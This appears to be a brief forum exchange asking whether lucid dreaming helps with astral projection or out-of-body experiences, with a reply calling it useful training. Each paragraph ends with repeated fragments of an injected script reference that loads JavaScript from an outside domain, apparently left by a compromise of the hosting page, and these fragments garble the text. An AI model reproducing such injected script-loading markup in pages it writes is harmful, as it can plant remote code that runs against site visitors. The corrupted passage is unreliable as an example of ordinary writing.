Could Lucid Dreaming help you progress twords Astral Projection? Or if your in the middle of a Lucid Dream, can you create an OBE or AP? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Lucid dreaming is an advantage when doing AP.It's like training yourself to control your conciousness.But having an OBE in the middle of a lucid dreaming sounds impossible since you have to push or get yourself out while having a vibrational or trance like state. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
